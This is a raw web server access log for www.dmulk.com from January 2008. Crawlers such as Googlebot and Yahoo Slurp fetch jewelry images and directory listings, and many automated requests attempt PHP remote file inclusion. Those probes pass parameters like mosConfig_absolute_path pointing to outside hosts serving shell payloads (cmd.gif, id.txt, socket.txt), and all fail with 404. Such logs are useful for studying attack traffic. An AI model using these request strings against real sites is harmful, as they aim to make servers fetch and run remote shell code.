83.168.205.154 - - [18/Jan/2008:19:35:01 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.netmeup.ro/components/.../test.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
83.168.205.154 - - [18/Jan/2008:19:35:01 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.netmeup.ro/components/.../test.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:19:42:23 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.6.102.165 - - [18/Jan/2008:19:44:00 -0800] "GET //embed/day.php?path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
66.6.102.165 - - [18/Jan/2008:19:44:00 -0800] "GET /logs//embed/day.php?path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
125.231.1.48 - - [18/Jan/2008:19:44:35 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.231.1.48 - - [18/Jan/2008:19:44:35 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.231.1.48 - - [18/Jan/2008:19:44:36 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.103.152.151 - - [18/Jan/2008:19:46:13 -0800] "GET /logs//embed/day.php?path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.103.152.151 - - [18/Jan/2008:19:46:13 -0800] "GET //embed/day.php?path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
82.194.82.253 - - [18/Jan/2008:19:48:43 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/suntik?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.231.1.48 - - [18/Jan/2008:19:48:46 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.231.1.48 - - [18/Jan/2008:19:48:47 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.231.1.48 - - [18/Jan/2008:19:48:47 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.126 - - [18/Jan/2008:19:50:04 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071214 BonEcho/2.0.0.4" "www.dmulk.com"
216.127.70.92 - - [18/Jan/2008:19:52:56 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.127.70.92 - - [18/Jan/2008:19:52:56 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.28.22 - - [18/Jan/2008:19:53:06 -0800] "GET /logs/access_070913.log HTTP/1.0" 200 105654 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.127.70.92 - - [18/Jan/2008:19:53:11 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.127.70.92 - - [18/Jan/2008:19:53:11 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.46.203 - - [18/Jan/2008:19:54:33 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.46.203 - - [18/Jan/2008:19:54:33 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.46.203 - - [18/Jan/2008:19:54:33 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.46.203 - - [18/Jan/2008:19:58:55 -0800] "GET /_theme/breadcrumb.php?rootBase=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
216.246.46.203 - - [18/Jan/2008:19:59:07 -0800] "GET /logs/_theme/breadcrumb.php?rootBase=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
74.6.19.110 - - [18/Jan/2008:20:05:02 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.156 - - [18/Jan/2008:20:05:03 -0800] "GET /tmp/sess_3d4c3880bdacccd0de3b408052522ecd HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:20:05:16 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.82.253 - - [18/Jan/2008:20:06:10 -0800] "GET /index.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/suntik?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:08:16 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:08:19 -0800] "GET /megumi/Necklace/27_Woods_and_Coral_30.JPG HTTP/1.0" 200 2183239 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:08:25 -0800] "GET /megumi/Necklace/11_Pearl_Shell_Flower_Set_30.JPG HTTP/1.0" 200 2041957 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:08:31 -0800] "GET /megumi/Necklace/22_Mother_of_Pearl_Set_25.JPG HTTP/1.0" 200 2167798 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:08:42 -0800] "GET /megumi/Necklace/23_Olive_Jade_Sterling_Silver_25.JPG HTTP/1.0" 200 2288693 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:08:52 -0800] "GET /megumi/Necklace/14_White_Bone_Choker_20.JPG HTTP/1.0" 200 2152067 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:08:59 -0800] "GET /megumi/Necklace/5_Turquoise_Sterling_Slver_sets_30.JPG HTTP/1.0" 200 2237713 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:09:05 -0800] "GET /megumi/Necklace/13_Blue_Choker_18.JPG HTTP/1.0" 200 2150526 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:09:12 -0800] "GET /megumi/Necklace/16_Copper_Heart_Set_BR_30.JPG HTTP/1.0" 200 2370511 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:20:09:19 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:09:24 -0800] "GET /megumi/Necklace/18_Copper_Single_Pearl_BF_Set_30.JPG HTTP/1.0" 200 2041785 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:09:30 -0800] "GET /megumi/Necklace/17_Copper_Heart_Set_RD_30.JPG HTTP/1.0" 200 2364018 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:09:38 -0800] "GET /megumi/Necklace/2_Turquoise_Bracelet_Green_30.JPG HTTP/1.0" 200 2180021 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:09:45 -0800] "GET /megumi/Necklace/9_Garnet_Pearl_Choker_35.JPG HTTP/1.0" 200 2192240 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:09:51 -0800] "GET /megumi/Necklace/15_Copper_Double_Pearl_BF_Set_45.JPG HTTP/1.0" 200 2152462 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:09:56 -0800] "GET /megumi/Necklace/10_Amethyst_Garnet_Choker_set_40.JPG HTTP/1.0" 200 718586 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:10:01 -0800] "GET /megumi/Necklace/4_Crystal_28_Turquoise_25.JPG HTTP/1.0" 200 2161420 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:10:23 -0800] "GET /megumi/Necklace/6_Turquoise_Leather_Choker_Set_20.JPG HTTP/1.0" 200 2266942 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:10:33 -0800] "GET /megumi/Necklace/1_Turquoise_Sterling_Silver_Set_Green_75.JPG HTTP/1.0" 200 2071638 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:10:39 -0800] "GET /megumi/Necklace/3_Turquoise_Sterling_Silver_Set_Blue_70.JPG HTTP/1.0" 200 2070239 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [18/Jan/2008:20:10:52 -0800] "GET /megumi/Necklace/20_Brown_Horn_Choker_20.JPG HTTP/1.0" 200 1994861 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.28.71 - - [18/Jan/2008:20:14:47 -0800] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.219 - - [18/Jan/2008:20:16:30 -0800] "GET /minamijewelry/source_images/?M=D HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
60.80.40.5 - - [18/Jan/2008:20:17:52 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.19.235 - - [18/Jan/2008:20:19:05 -0800] "GET /megumi/?M=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.221 - - [18/Jan/2008:20:19:06 -0800] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:20:20:58 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:20:20:58 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.25.157 - - [18/Jan/2008:20:21:51 -0800] "GET /tmp/sess_29e7439fd5f74f974aea6887d22a65ea HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.218 - - [18/Jan/2008:20:23:02 -0800] "GET /mobileoffice/?N=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.73 - - [18/Jan/2008:20:25:23 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
134.114.249.173 - - [18/Jan/2008:20:27:23 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.44 - - [18/Jan/2008:20:27:52 -0800] "GET /funny/?S=D HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:20:28:07 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:20:28:07 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
134.114.249.173 - - [18/Jan/2008:20:28:30 -0800] "GET /logs/access_071230.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.114.249.173 - - [18/Jan/2008:20:28:30 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.80.40.5 - - [18/Jan/2008:20:30:19 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.80.40.5 - - [18/Jan/2008:20:30:30 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.33.2.131 - - [18/Jan/2008:20:32:12 -0800] "GET /logs/access_071229.log/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.33.2.131 - - [18/Jan/2008:20:32:14 -0800] "GET /index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.33.2.131 - - [18/Jan/2008:20:32:15 -0800] "GET /logs/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.157.77 - - [18/Jan/2008:20:38:23 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
85.119.157.77 - - [18/Jan/2008:20:38:23 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
85.119.157.77 - - [18/Jan/2008:20:38:23 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:20:44:26 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:20:44:55 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:20:44:55 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:20:44:55 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.87.205.164 - - [18/Jan/2008:20:44:59 -0800] "GET /main.php?pagina=http://h1.ripway.com/brunoz/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
88.87.205.164 - - [18/Jan/2008:20:45:00 -0800] "GET /logs/main.php?pagina=http://h1.ripway.com/brunoz/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:20:46:59 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:20:46:59 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:20:46:59 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:20:46:59 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:20:49:32 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:20:49:32 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:20:49:33 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:20:49:33 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.49.42 - - [18/Jan/2008:20:51:10 -0800] "GET /!scanhttp://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.49.42 - - [18/Jan/2008:20:51:10 -0800] "GET /logs/!scanhttp://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.58.140.237 - - [18/Jan/2008:20:51:30 -0800] "GET /index.php?redir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.28 - - [18/Jan/2008:20:52:05 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.87.205.164 - - [18/Jan/2008:20:52:14 -0800] "GET /index2.php?showpage=http://h1.ripway.com/brunoz/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
88.87.205.164 - - [18/Jan/2008:20:52:14 -0800] "GET /logs/index2.php?showpage=http://h1.ripway.com/brunoz/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
74.6.26.162 - - [18/Jan/2008:20:53:04 -0800] "GET /logs/ HTTP/1.0" 200 30666 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.18.220.122 - - [18/Jan/2008:20:57:47 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:20:59:14 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:20:59:14 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:20:59:25 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:20:59:25 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.140.234.80 - - [18/Jan/2008:21:03:07 -0800] "GET /index.php?redir=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.140.237 - - [18/Jan/2008:21:05:34 -0800] "GET /logs/access_080101.log/index.php?redir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.140.237 - - [18/Jan/2008:21:05:35 -0800] "GET /logs/index.php?redir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.38.10.218 - - [18/Jan/2008:21:05:40 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.140.237 - - [18/Jan/2008:21:06:09 -0800] "GET /logs/access.log/index.php?redir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [18/Jan/2008:21:09:36 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [18/Jan/2008:21:09:36 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [18/Jan/2008:21:09:37 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [18/Jan/2008:21:10:41 -0800] "GET /funny/?N=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.106.19.18 - - [18/Jan/2008:21:11:20 -0800] "GET /index.php?redir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.51.108.62 - - [18/Jan/2008:21:13:52 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.51.108.62 - - [18/Jan/2008:21:13:52 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
